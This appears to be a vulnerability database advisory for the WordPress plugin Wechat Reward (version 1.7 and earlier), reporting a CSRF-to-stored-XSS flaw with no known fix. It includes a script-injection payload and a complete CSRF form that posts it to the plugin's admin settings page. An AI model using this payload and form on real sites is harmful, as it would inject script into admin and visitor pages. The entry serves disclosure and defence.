WordPress Plugin Vulnerabilities

Wechat Reward <= 1.7 - CSRF to Stored Cross-Site Scripting

Description

The plugin does not sanitise or escape its QR settings, nor has any CSRF check in place, allowing attackers to make a logged in admin change the settings and perform Cross-Site Scripting attacks.

Proof of Concept

Put the following payload in the QR setting: "><script>alert(/XSS/)</script>

The XSS will be triggered in the plugin's setting page, as well as all frontend posts.

via CSRF:

<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=upload_wechat_QR" method="POST">
      <input type="hidden" name="wechatQR" value='"><script>alert(/XSS/)</script>' />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

No known fix

References

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
听雨眠
Submitter
tym
Verified
Yes

Timeline

Publicly Published
2021-09-20 (about 2 years ago)
Added
2021-09-20 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other